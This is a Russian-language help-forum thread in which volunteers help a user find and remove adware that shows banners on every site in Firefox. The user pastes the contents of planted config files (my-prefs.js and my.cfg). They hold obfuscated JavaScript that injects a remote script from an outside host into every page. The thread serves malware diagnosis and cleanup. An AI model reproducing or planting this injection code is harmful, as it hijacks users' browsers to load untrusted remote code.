Появились рекламные баннеры на всех сайтах в Только!!! в Мозиле. Подозрительных дополнений нет вроде...
Printable View
Появились рекламные баннеры на всех сайтах в Только!!! в Мозиле. Подозрительных дополнений нет вроде...
Уважаемый(ая) [B]pavlentiy67[/B], спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в [URL="http://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Обновите базы AVZ и переделайте логи
Обновился...
Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.
[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]"List BCD"[/i] и [i]"Driver MD5"[/i].
[img]http://i.imgur.com/B92LqRQ.png[/img][*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]
Прикрепляю файлы
[QUOTE]C:\Program Files\mozilla firefox\browser\defaults\preferences\my-prefs.js
C:\Program Files\mozilla firefox\my.cfg[/QUOTE]эти файлы изменились (были созданы) 17 апреля. Что в них?
В файле my-prefs.js такой код...
[CODE]pref('general.config.filename', 'my.cfg');
pref('general.config.obscure_value', 0);[/CODE]
А в файле my.cfg зашифрованный длинный код [CODE]// First line is ommited
try{
var inline_code = '(function() {var appName = encodeURIComponent("__APP_NAME__");var userId = "__USER_ID__";var appId = "__APP_ID__";var campId = "__CAMP_ID__";try {var _0x1efb=["\x5F\x5F\x41\x50\x50\x5F\x4E\x41\x4D\x45\x5F\x5F","\x6E\x61\x6D\x65","\x6C\x65\x6E\x67\x74\x68","\x69\x6E\x64\x65\x78\x4F\x66","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x73\x6D\x61\x72\x74\x73\x68\x6F\x70\x70\x69\x6E\x67\x2E\x63\x6F\x6D","\x73\x68\x6F\x70\x70\x73\x74\x6F\x70\x2E\x63\x6F\x6D","\x6C\x6F\x63\x61\x6C\x6D\x6F\x78\x69\x65\x2E\x63\x6F\x6D","\x79\x65\x6C\x6C\x6F\x77\x6D\x6F\x78\x69\x65\x2E\x63\x6F\x6D","\x [/CODE]
и так далее а в конце [CODE]var _injectInlineJSCode=function(a,b){var c=b.createElement("script");c.setAttribute("type","text/javascript");c.innerHTML=a;(b.getElementsByTagName("head")[0]||b.getElementsByTagName("body")[0]).appendChild(c)},_handleDocumentElementInsterted=function(a){if(a&&a instanceof Components.interfaces.nsIDOMHTMLDocument){var b=a&&a.defaultView?a.defaultView:null;b&&b===b.top&&(_injectInlineJSCode("setTimeout(function(){var tag = document.createElement('script');tag.setAttribute('type','text/javascript');tag.setAttribute('src','//icm.r.worldssl.net/ff/m.js');(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(tag);},1000*2);",
a),_injectInlineJSCode("setTimeout(function(){"+inline_code+"},1000*3);",a))}},observerService=Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver({QueryInterface:function(a){if(a.equals(Components.interfaces.nsIObserver)||a.equals(Components.interfaces.nsISupports)||a.equals(Components.interfaces.nsISupportsWeakReference))return this;throw Components.results.NS_NOINTERFACE;},observe:function(a,b,c){try{"document-element-inserted"===b&&_handleDocumentElementInsterted(a)}catch(d){}}},"document-element-inserted",!1);
})();
} catch(e){[/CODE]
Похоже что именно так и подключается реклама. Я вчера полностью удалял Мозилу и заново устанавливал кстати.
Переместите эти файлы куда-нибудь в другое место и проверьте проблему
Без них рекламы нет, все работает хорошо. Но странно, я же переустанавливал до этого и полностью удалял и ставил заново..А они откуда то снова появлялись
Оба файла заархивируйте с паролем virus и пришлите по красной ссылке [COLOR="Red"][U][B]Прислать запрошенный карантин[/B][/U][/COLOR] вверху темы
После этого оба файла удалите
Готово. Спасибо за помощь!
Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]1[/B][*]Обработано файлов: [B]2[/B][*]В ходе лечения вредоносные программы в карантинах не обнаружены[/LIST]